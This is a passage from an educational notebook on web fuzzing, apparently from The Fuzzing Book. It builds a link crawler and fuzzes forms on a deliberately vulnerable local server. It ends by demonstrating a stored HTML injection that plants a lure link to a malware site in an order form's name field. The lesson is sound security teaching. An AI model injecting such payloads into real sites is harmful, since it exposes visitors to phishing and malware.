     "shell.execute_reply": "2025-01-16T10:12:26.408312Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class LinkHTMLParser(HTMLParser):\n",
    "    \"\"\"Parse all links found in a HTML page\"\"\"\n",
    "\n",
    "    def reset(self):\n",
    "        super().reset()\n",
    "        self.links = []\n",
    "\n",
    "    def handle_starttag(self, tag, attrs):\n",
    "        attributes = {attr_name: attr_value for attr_name, attr_value in attrs}\n",
    "\n",
    "        if tag == \"a\" and \"href\" in attributes:\n",
    "            # print(\"Found:\", tag, attributes)\n",
    "            self.links.append(attributes[\"href\"])"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The actual crawler comes as a _generator function_ `crawl()` which produces one URL after another.  By default, it returns only URLs that reside on the same host; the parameter `max_pages` controls how many pages (default: 1) should be scanned.  We also respect the `robots.txt` file on the remote site to check which pages we are allowed to scan."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Excursion: Implementing a Crawler"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 125,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.409914Z",
     "iopub.status.busy": "2025-01-16T10:12:26.409823Z",
     "iopub.status.idle": "2025-01-16T10:12:26.412175Z",
     "shell.execute_reply": "2025-01-16T10:12:26.411962Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from collections import deque\n",
    "import urllib.robotparser"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 126,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.413522Z",
     "iopub.status.busy": "2025-01-16T10:12:26.413436Z",
     "iopub.status.idle": "2025-01-16T10:12:26.416633Z",
     "shell.execute_reply": "2025-01-16T10:12:26.416395Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "def crawl(url, max_pages: Union[int, float] = 1, same_host: bool = True):\n",
    "    \"\"\"Return the list of linked URLs from the given URL.\n",
    "    `max_pages` - the maximum number of pages accessed.\n",
    "    `same_host` - if True (default), stay on the same host\"\"\"\n",
    "\n",
    "    pages = deque([(url, \"<param>\")])\n",
    "    urls_seen = set()\n",
    "\n",
    "    rp = urllib.robotparser.RobotFileParser()\n",
    "    rp.set_url(urljoin(url, \"/robots.txt\"))\n",
    "    rp.read()\n",
    "\n",
    "    while len(pages) > 0 and max_pages > 0:\n",
    "        page, referrer = pages.popleft()\n",
    "        if not rp.can_fetch(\"*\", page):\n",
    "            # Disallowed by robots.txt\n",
    "            continue\n",
    "\n",
    "        r = requests.get(page)\n",
    "        max_pages -= 1\n",
    "\n",
    "        if r.status_code != HTTPStatus.OK:\n",
    "            print(\"Error \" + repr(r.status_code) + \": \" + page,\n",
    "                  \"(referenced from \" + referrer + \")\",\n",
    "                  file=sys.stderr)\n",
    "            continue\n",
    "\n",
    "        content_type = r.headers[\"content-type\"]\n",
    "        if not content_type.startswith(\"text/html\"):\n",
    "            continue\n",
    "\n",
    "        parser = LinkHTMLParser()\n",
    "        parser.feed(r.text)\n",
    "\n",
    "        for link in parser.links:\n",
    "            target_url = urljoin(page, link)\n",
    "            if same_host and urlsplit(\n",
    "                    target_url).hostname != urlsplit(url).hostname:\n",
    "                # Different host\n",
    "                continue\n",
    "\n",
    "            if urlsplit(target_url).fragment != \"\":\n",
    "                # Ignore #fragments\n",
    "                continue\n",
    "\n",
    "            if target_url not in urls_seen:\n",
    "                pages.append((target_url, page))\n",
    "                urls_seen.add(target_url)\n",
    "                yield target_url\n",
    "\n",
    "        if page not in urls_seen:\n",
    "            urls_seen.add(page)\n",
    "            yield page"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### End of Excursion"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can run the crawler on our own server, where it will quickly return the order page and the terms and conditions page."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 127,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.417990Z",
     "iopub.status.busy": "2025-01-16T10:12:26.417903Z",
     "iopub.status.idle": "2025-01-16T10:12:26.428135Z",
     "shell.execute_reply": "2025-01-16T10:12:26.427925Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /robots.txt HTTP/1.1\" 404 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET / HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"http://127.0.0.1:8800/terms\">http://127.0.0.1:8800/terms</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"http://127.0.0.1:8800\">http://127.0.0.1:8800</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "for url in crawl(httpd_url):\n",
    "    print_httpd_messages()\n",
    "    print_url(url)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can also crawl over other sites, such as the home page of this project."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 128,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.429620Z",
     "iopub.status.busy": "2025-01-16T10:12:26.429524Z",
     "iopub.status.idle": "2025-01-16T10:12:26.701673Z",
     "shell.execute_reply": "2025-01-16T10:12:26.701375Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/\">https://www.fuzzingbook.org/</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/00_Table_of_Contents.html\">https://www.fuzzingbook.org/html/00_Table_of_Contents.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/01_Intro.html\">https://www.fuzzingbook.org/html/01_Intro.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Tours.html\">https://www.fuzzingbook.org/html/Tours.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Intro_Testing.html\">https://www.fuzzingbook.org/html/Intro_Testing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/02_Lexical_Fuzzing.html\">https://www.fuzzingbook.org/html/02_Lexical_Fuzzing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Fuzzer.html\">https://www.fuzzingbook.org/html/Fuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Coverage.html\">https://www.fuzzingbook.org/html/Coverage.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/MutationFuzzer.html\">https://www.fuzzingbook.org/html/MutationFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/GreyboxFuzzer.html\">https://www.fuzzingbook.org/html/GreyboxFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/SearchBasedFuzzer.html\">https://www.fuzzingbook.org/html/SearchBasedFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/MutationAnalysis.html\">https://www.fuzzingbook.org/html/MutationAnalysis.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/03_Syntactical_Fuzzing.html\">https://www.fuzzingbook.org/html/03_Syntactical_Fuzzing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Grammars.html\">https://www.fuzzingbook.org/html/Grammars.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/GrammarFuzzer.html\">https://www.fuzzingbook.org/html/GrammarFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/GrammarCoverageFuzzer.html\">https://www.fuzzingbook.org/html/GrammarCoverageFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Parser.html\">https://www.fuzzingbook.org/html/Parser.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/ProbabilisticGrammarFuzzer.html\">https://www.fuzzingbook.org/html/ProbabilisticGrammarFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/GeneratorGrammarFuzzer.html\">https://www.fuzzingbook.org/html/GeneratorGrammarFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/GreyboxGrammarFuzzer.html\">https://www.fuzzingbook.org/html/GreyboxGrammarFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Reducer.html\">https://www.fuzzingbook.org/html/Reducer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/04_Semantical_Fuzzing.html\">https://www.fuzzingbook.org/html/04_Semantical_Fuzzing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/FuzzingWithConstraints.html\">https://www.fuzzingbook.org/html/FuzzingWithConstraints.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/GrammarMiner.html\">https://www.fuzzingbook.org/html/GrammarMiner.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/InformationFlow.html\">https://www.fuzzingbook.org/html/InformationFlow.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/ConcolicFuzzer.html\">https://www.fuzzingbook.org/html/ConcolicFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/SymbolicFuzzer.html\">https://www.fuzzingbook.org/html/SymbolicFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/DynamicInvariants.html\">https://www.fuzzingbook.org/html/DynamicInvariants.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/05_Domain-Specific_Fuzzing.html\">https://www.fuzzingbook.org/html/05_Domain-Specific_Fuzzing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/ConfigurationFuzzer.html\">https://www.fuzzingbook.org/html/ConfigurationFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/APIFuzzer.html\">https://www.fuzzingbook.org/html/APIFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Carver.html\">https://www.fuzzingbook.org/html/Carver.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/PythonFuzzer.html\">https://www.fuzzingbook.org/html/PythonFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/WebFuzzer.html\">https://www.fuzzingbook.org/html/WebFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/GUIFuzzer.html\">https://www.fuzzingbook.org/html/GUIFuzzer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/06_Managing_Fuzzing.html\">https://www.fuzzingbook.org/html/06_Managing_Fuzzing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/FuzzingInTheLarge.html\">https://www.fuzzingbook.org/html/FuzzingInTheLarge.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/WhenToStopFuzzing.html\">https://www.fuzzingbook.org/html/WhenToStopFuzzing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/99_Appendices.html\">https://www.fuzzingbook.org/html/99_Appendices.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/AcademicPrototyping.html\">https://www.fuzzingbook.org/html/AcademicPrototyping.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/PrototypingWithPython.html\">https://www.fuzzingbook.org/html/PrototypingWithPython.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/ExpectError.html\">https://www.fuzzingbook.org/html/ExpectError.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Timer.html\">https://www.fuzzingbook.org/html/Timer.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Timeout.html\">https://www.fuzzingbook.org/html/Timeout.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/ClassDiagram.html\">https://www.fuzzingbook.org/html/ClassDiagram.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/RailroadDiagrams.html\">https://www.fuzzingbook.org/html/RailroadDiagrams.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/ControlFlow.html\">https://www.fuzzingbook.org/html/ControlFlow.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/00_Index.html\">https://www.fuzzingbook.org/html/00_Index.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/dist/fuzzingbook-code.zip\">https://www.fuzzingbook.org/dist/fuzzingbook-code.zip</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/dist/fuzzingbook-notebooks.zip\">https://www.fuzzingbook.org/dist/fuzzingbook-notebooks.zip</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/ReleaseNotes.html\">https://www.fuzzingbook.org/html/ReleaseNotes.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Importing.html\">https://www.fuzzingbook.org/html/Importing.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/slides/Fuzzer.slides.html\">https://www.fuzzingbook.org/slides/Fuzzer.slides.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre><a href=\"https://www.fuzzingbook.org/html/Guide_for_Authors.html\">https://www.fuzzingbook.org/html/Guide_for_Authors.html</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "for url in crawl(\"https://www.fuzzingbook.org/\"):\n",
    "    print_url(url)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Once we have crawled over all the links of a site, we can generate tests for all the forms we found:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 129,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.707777Z",
     "iopub.status.busy": "2025-01-16T10:12:26.707634Z",
     "iopub.status.idle": "2025-01-16T10:12:26.733384Z",
     "shell.execute_reply": "2025-01-16T10:12:26.733063Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "('http://127.0.0.1:8800/terms', 'PASS')\n",
      "('http://127.0.0.1:8800/order?item=tshirt&name=+&email=b+%742%40+&city=%45%39&zip=54&terms=on&submit=', 'PASS')\n",
      "('http://127.0.0.1:8800/order?item=drill&name=%52-&email=e%40%3f&city=+&zip=5&terms=on&submit=', 'PASS')\n"
     ]
    }
   ],
   "source": [
    "for url in crawl(httpd_url, max_pages=float('inf')):\n",
    "    web_form_fuzzer = WebFormFuzzer(url)\n",
    "    web_form_runner = WebRunner(url)\n",
    "    print(web_form_fuzzer.run(web_form_runner))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "For even better effects, one could integrate crawling and fuzzing – and also analyze the order confirmation pages for further links.  We leave this to the reader as an exercise."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Let us get rid of any server messages accumulated above:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 130,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.735221Z",
     "iopub.status.busy": "2025-01-16T10:12:26.735102Z",
     "iopub.status.idle": "2025-01-16T10:12:26.737376Z",
     "shell.execute_reply": "2025-01-16T10:12:26.737112Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "clear_httpd_messages()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Crafting Web Attacks\n",
    "\n",
    "Before we close the chapter, let us take a look at a special class of \"uncommon\" inputs that not only yield generic failures, but actually allow _attackers_ to manipulate the server at their will.  We will illustrate three common attacks using our server, which (surprise) actually turns out to be vulnerable against all of them."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### HTML Injection Attacks\n",
    "\n",
    "The first kind of attack we look at is *HTML injection*.  The idea of HTML injection is to supply the Web server with _data that can also be interpreted as HTML_.  If this HTML data is then displayed to users in their Web browsers, it can serve malicious purposes, although (seemingly) originating from a reputable site.  If this data is also _stored_, it becomes a _persistent_ attack; the attacker does not even have to lure victims towards specific pages."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Here is an example of a (simple) HTML injection.  For the `name` field, we not only use plain text, but also embed HTML tags – in this case, a link towards a malware-hosting site."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 131,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.738879Z",
     "iopub.status.busy": "2025-01-16T10:12:26.738785Z",
     "iopub.status.idle": "2025-01-16T10:12:26.740321Z",
     "shell.execute_reply": "2025-01-16T10:12:26.740101Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from Grammars import extend_grammar"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 132,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.741639Z",
     "iopub.status.busy": "2025-01-16T10:12:26.741541Z",
     "iopub.status.idle": "2025-01-16T10:12:26.743292Z",
     "shell.execute_reply": "2025-01-16T10:12:26.743051Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {\n",
    "    \"<name>\": [cgi_encode('''\n",
    "    Jane Doe<p>\n",
    "    <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\n",
    "    </p>\n",
    "    ''')],\n",
    "})"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "If we use this grammar to create inputs, the resulting URL will have all of the HTML encoded in:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 133,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.744638Z",
     "iopub.status.busy": "2025-01-16T10:12:26.744549Z",
     "iopub.status.idle": "2025-01-16T10:12:26.746898Z",
     "shell.execute_reply": "2025-01-16T10:12:26.746697Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'/order?item=drill&name=%0a++++Jane+Doe%3cp%3e%0a++++%3cstrong%3e%3ca+href%3d%22www.lots.of.malware%22%3eClick+here+for+cute+cat+pictures!%3c%2fa%3e%3c%2fstrong%3e%0a++++%3c%2fp%3e%0a++++&email=j_smith%40example.com&city=Seattle&zip=02805'"
      ]
     },
     "execution_count": 133,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)\n",
    "order_with_injected_html = html_injection_fuzzer.fuzz()\n",
    "order_with_injected_html"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "What happens if we send this string to our Web server?  It turns out that the HTML is left in the confirmation page and shown as link.  This also happens in the log:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 134,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.748321Z",
     "iopub.status.busy": "2025-01-16T10:12:26.748235Z",
     "iopub.status.idle": "2025-01-16T10:12:26.753471Z",
     "shell.execute_reply": "2025-01-16T10:12:26.753227Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] INSERT INTO orders VALUES ('drill', '\n",
       "    Jane Doe<p>\n",
       "    <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\n",
       "    </p>\n",
       "    ', 'j_smith@example.com', 'Seattle', '02805')\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
